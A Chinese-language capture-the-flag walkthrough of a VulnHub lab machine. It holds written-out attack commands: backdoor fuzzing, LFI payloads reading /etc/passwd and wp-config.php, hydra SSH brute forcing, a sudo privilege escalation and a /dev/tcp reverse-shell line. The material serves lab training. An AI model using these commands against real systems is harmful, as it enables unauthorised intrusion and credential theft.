简介
每日一攻防是由全球安全研究员 VulnHub 提供的日常实战综合环境。大余安全将按照顺序选择 VulnHub 提供的渗透测试靶场,为网络安全爱好者、渗透测试从业者和安全研究员提供每日综合性的攻击和防御挑战。该项目的目标是促进参与者的技能提升,使他们更好地理解实际攻击和防御场景。
每日一攻防特色:
环境攻破: 以简单直白的方式攻破每日选择的渗透测试环境。
代码审计: 进行攻防分析,结合代码审计,深入挖掘漏洞和强化防御。
作者:大余
一、网络枚举
nmap枚举发现ip地址:192.168.3.37
二、web信息收集
发现是个Wordpress网站,但是没有正确解析,点击Hello Blue发现无法访问
192.168.3.37 redrocks.win
将其添加到主机文件中:
再次访问:
三、爆破FUZZ-LFI
根据页面信息看到网站已经被入侵,并且提到有后门,看了其他的地方暂时也没发现什么,那就先看一下后门,因为WordPress 在 Apache PHP上运行。所以应该是 php 后门,用目录扫描看看能不能扫出疑似后门的文件,所以用SecLists里的CommonBackdoors-PHP.fuzz.txt扫。
下载地址:
https://github.com/danielmiessler/SecLists
命令执行:
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt -x .php -u http://redrocks.win/ -o dayu.txt -z
发现可疑文件NetworkFileManagerPHP.php,猜测可能是webshell后门,扫描结果状态码是500,这个脚本可能存在LFI,使用wfuzz测试一下参数:
wfuzz -c -u 'http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test' -w 1.txt
发现key参数返回200,那就使用key参数测试一下:
http://redrocks.win/NetworkFileManagerPHP.php?key=../../../../../etc/passwd
测试成功。说明有文件包含。那接下来查看一下 NetworkFileManagerPHP.php 文件:
http://redrocks.win/NetworkFileManagerPHP.php?key=php://filter/convert.base64-encode/resource=NetworkFileManagerPHP.php
通过base64编译发现:
That password alone won't help you! Hashcat says rules are rules
仅凭那个密码对您没有帮助!让我们使用Hashcat规则!
四、base64-hashcat-hydra
提到了密码、Hashcat和规则。由于它是base64编码的,我们可以假设Red在谈论Hashcat的Best64规则为密码突变,想到的这里大概能获取wp-config文件,里面有数据库的密码:
http://redrocks.win/NetworkFileManagerPHP.php?key=php://filter/convert.base64-encode/resource=wp-config.php
john
R3v_m4lwh3r3_k1nG!!
用户名是john,前面查看/etc/passwd文件时发现也有john用户,那就用这个用户登录ssh,将密码保存到文件中,然后用hashcat规则破解:
hashcat --stdout pass.txt -r /usr/share/hashcat/rules/best64.rule > passlist.txt
使用解出来的密码本进行ssh爆破:
hydra -l john -P passlist.txt 192.168.3.37 ssh
ssh john@192.168.3.37
R3v_m4lwh3r3_k1nG!!00
五、提权一
查看底下note_from_red.txt文件提示cat存在命令存在问题。
发现会以ippsec用户执行/usr/bin/time:
提权成ippsec用户:
https://gtfobins.github.io/gtfobins/time/#sudo
sudo -u ippsec /usr/bin/time /bin/bash
切换成功,查看目录发现正准备下一步时ssh连接被断开了:
#!/bin/bash
bash -c 'bash -i >& /dev/tcp/192.168.3.56/1234 0>&1'
五、提权二
虽然Red team的信息还在弹,但是已经不会被断开连接了。下载并运行pspy64检查,看看系统在跑哪些进程。下载pspy64,赋权并运行:
/var/www/wordpress/.git/supersecretfileuc.c
发现是定时弹出的脚本,可以上传一个C编写 shell,替代supersecretfileuc.c文件,然后等待 shell 连接,先删除/var/www/wordpress/.git/supersecretfileuc.c和rev文件:
cd /var/www/wordpress/.git/
rm -r supersecretfileuc.c
写入C编写的shell替换掉原来的supersecretfileuc.c,kali上开启http服务上传:
最后获得root权限!
通过每日一攻防,我致力于共同深探网络安全的奥秘,助力每位参与者成为网络安全领域的技术高手。立即加入大余安全,共同迎接每日新的挑战!
欢迎大家进入大余安全回忆录帮会,每周二&五定期更新《安全开发》、《渗透测试》系列文章,帮助大家从0基础到入门。